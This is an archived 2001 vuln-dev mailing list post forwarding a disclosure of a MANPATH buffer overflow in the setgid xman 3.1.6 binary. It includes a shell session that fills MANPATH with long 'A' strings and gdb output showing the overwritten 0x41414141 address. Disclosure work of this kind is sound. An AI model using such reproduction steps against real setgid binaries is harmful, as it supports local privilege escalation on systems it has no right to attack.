Vulnerability Development mailing list archives

[Fwd: suid xman 3.1.6 overflows]


From: KF <dotslash () snosoft com>
Date: Thu, 12 Jul 2001 21:35:13 -0400

I tried to send this to Bugtraq right about the same time I had
connection issues... I'm not sure whether it was rejected, so I figured
I would also send it to vuln-dev just in case.
-KF 

-------- Original Message --------
Subject: suid xman 3.1.6 overflows
Date: Wed, 11 Jul 2001 23:32:49 -0400
From: KF <dotslash () snosoft com>
To: bugtraq () securityfocus com, srtxg () chanae alphanet ch

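xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic
overflow when it is started with an overly long MANPATH environment
variable (see the session below). Note that the listing below shows the
binary installed setgid man (mode -rwxr-sr-x, owner root, group man), so
the privilege at stake appears to be group man rather than root.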

srtxg () chanae alphanet ch is noted as the packager of this RPM. I do not
know the author.

[root@linux lib]# ls -al `which xman`
-rwxr-sr-x    1 root     man         41076 Jun 17  1998 /usr/X11R6/bin/xman*

[root@linux lib]# xman
[root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
[root@linux lib]# xman
Xman Error: Could not allocate memory for manual sections.

[root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
[root@linux lib]# xman
Segmentation fault

[root@linux lib]# gdb xman
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
(gdb) run
Starting program: /usr/X11R6/bin/xman
0x4022fb66 in getenv () from /lib/libc.so.6
(gdb) bt
#0  0x4022fb66 in getenv () from /lib/libc.so.6
#1  0x0804bc47 in _start ()
#2  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

(gdb) info registers
eax            0xbffee784       -1073813628
ecx            0x804fb29        134544169
edx            0x805414c        134562124
ebx            0x40328f2c       1077055276
esp            0xbffec6fc       0xbffec6fc
ebp            0xbffec714       0xbffec714
esi            0x6      6
edi            0x41414141       1094795585
eip            0x4022fb66       0x4022fb66

-KF

